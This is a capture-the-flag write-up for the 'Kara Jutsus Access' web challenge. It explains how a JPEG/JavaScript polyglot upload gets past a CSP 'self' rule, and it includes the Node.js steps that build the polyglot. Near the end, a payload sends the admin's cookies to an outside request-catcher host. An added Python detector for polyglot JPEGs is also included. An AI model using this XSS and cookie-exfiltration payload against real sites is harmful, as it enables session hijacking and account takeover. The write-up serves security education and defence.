Yogosha Christmas CTF “Kara Jutsus Access” Write up
Challenge name: Kara Jutsus Access
Challenge category: Web
Challenge description: Well done accessing some important information! Now I heard that some Kara members use the following website for a reason, can you retrieve Dr Amado's cookie?
Recon
The first thing we see when we open the link is a blog post with a bunch of comments, plus two other pages (Profil, Report).
On the profile page we can only upload an image file (jpg, png, jpeg), and the upload is checked with PHP's getimagesize() function, so we must upload a valid (uncorrupted) image.
The third part of the website lets us report a URL, which a bot will then visit.
XSS with CSP
The first thing that comes to mind when we see the comment section and the report page is to check for XSS, so we can test with a simple header tag to see if there is an XSS.
Now we know that there is an XSS in the comment section. Next, let's check whether there is any CSP policy by viewing the source code:
<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none';">
Let's check whether we can bypass it with the help of CSP Evaluator: https://csp-evaluator.withgoogle.com
As we can see, if users can upload files, the 'self' source becomes exploitable: we can point the src of a script tag at the file we uploaded, and with that we can execute JavaScript code.
The problem is that we can only upload image files as an avatar, but we can solve this with a polyglot file upload.
Polyglot File upload
To make a file that is a valid image and at the same time contains JavaScript code, we need a polyglot file. After a bit of research on what a polyglot is and how to inject code into an image, I found these useful articles:
For that, I will use this simple jpg image from Wikipedia
As described in the article above, let's start by injecting 2F 2A (/*) between FF E0 and FF DB with ghex.
Now let's inject the rest of the payload as the above articles describe:
┌──(kali㉿kali)-[~/Downloads]
└─$ nodejs
Welcome to Node.js v18.10.0.
Type ".help" for more information.
> var a = fs.readFileSync('JPEG_example.jpg');
undefined
> var b = a.toString('hex');
undefined
> var c = b.substr(0,40);
undefined
> var d = Array(12040).fill("00").join("");
undefined
> var e = `*/=alert(1)/*`.split("").map(function(e){return e.charCodeAt(0).toString(16)}).join("");
undefined
> var f = b.substr(40,b.length);
undefined
> var g = c+d+e+f
undefined
> var h = Buffer.from(g,"hex");
undefined
> var i = fs.writeFile("polyglot.jpg",h,(error) => {if (error) throw error;})
undefined
Now we have a new file with the alert(1) payload injected. The final step is to close the second comment that the payload opened: with ghex, navigate to the end of the file and append */ to it.
Put it all together
Finally, the new image, with the payload injected into it, is ready to be uploaded.
Let's send it to Repeater to make it easier to change the payload.
Now that we have uploaded the file successfully, let's try to trigger it with a script tag in the comment section, setting the src of the script to the location where the jpg has been stored:
<script charset="ISO-8859-1" src="upload/1671984736984412283.jpg"></script>
And we have successfully run JavaScript code with it.
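An added defensive note, not part of the original write-up: getimagesize() only checks that the image header parses, which is exactly why the polyglot above passes. The Python example below (written for this page, not from the challenge) walks the JPEG marker segments and flags what this technique needs: a length field that doubles as "/*", JS comment delimiters inside a segment, and bytes appended after the EOI marker. The fixtures are constructed inline and only mimic the header layout.

```python
import struct

# Markers that carry no length field: SOI, EOI, TEM and RST0-RST7
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))


def jpeg_findings(data: bytes) -> list:
    """Walk the marker segments and report anything a JS polyglot relies on."""
    findings = []
    if data[:2] != b"\xff\xd8":
        return ["missing SOI marker: not a JPEG"]
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return findings + [f"non-marker byte at offset {pos}"]
        marker = data[pos + 1]
        if marker in STANDALONE:
            pos += 2
            continue
        length_bytes = data[pos + 2:pos + 4]
        (length,) = struct.unpack(">H", length_bytes)
        payload = data[pos + 4:pos + 2 + length]
        # 0x2F2A ("/*") is the classic polyglot length; any printable pair deserves a look
        if all(0x20 <= b < 0x7F for b in length_bytes):
            findings.append(f"marker 0x{marker:02X}: length field {length_bytes!r} reads as ASCII")
        if marker == 0xE0 and not payload.startswith((b"JFIF\x00", b"JFXX\x00")):
            findings.append("APP0 payload lacks a JFIF/JFXX signature")
        if b"/*" in payload or b"*/" in payload:
            findings.append(f"marker 0x{marker:02X}: JS comment delimiter inside segment")
        if marker == 0xDA:  # SOS: entropy-coded data runs to EOI; nothing may follow EOI
            eoi = data.rfind(b"\xff\xd9")
            if eoi < pos:
                findings.append("no EOI after scan data")
            elif data[eoi + 2:]:
                findings.append(f"{len(data) - eoi - 2} trailing bytes after EOI")
            return findings
        pos += 2 + length
    return findings + ["file ends inside a segment"]


def is_clean_jpeg(data: bytes) -> bool:
    return not jpeg_findings(data)


# Constructed fixtures (assumption: a minimal JPEG skeleton, not real image data)
_APP0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
CLEAN = (b"\xff\xd8" + _APP0 + b"\xff\xdb\x00\x05\x01\x02\x03"
         + b"\xff\xda\x00\x04\x01\x00" + b"\x12\x34" + b"\xff\xd9")
TRAILING = CLEAN + b"*/"  # the closing comment appended after EOI
POLYGLOT = (b"\xff\xd8\xff\xe0/*" + _APP0[4:] + b"\x00" * 64
            + b"*/=alert(1)/*" + CLEAN[20:] + b"*/")
```

A printable length field is only a heuristic (large Exif APP1 segments can trip it), so treat findings as a reason to re-encode or reject the upload rather than as proof of malice.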
The last thing we need is to retrieve the admin's cookies by reporting the infected URL to the admin. To do that, we first need a request catcher site; for that I will use requestcatcher.com
Now let's return to the Burp Suite Repeater and edit the payload so it sends the cookies to our request catcher, by setting the document location to our site and appending the cookies: document.location="https://cbl.requestcatcher.com/test?cookies"+document.cookie
Now let's test it on ourselves before reporting it. For that, we repeat the same process we used to trigger the alert, but replace the file name with the new one.
It worked, so let's report the URL to the admin to get his cookies.
And we have the flag in the cookies:
FLAG{K4ra_OnCe_Alw4y5_Kara????}
In the end, it was a great challenge by Kahla that combined two things: an XSS CSP bypass and a polyglot file upload.
25/12/2022
zoznoor23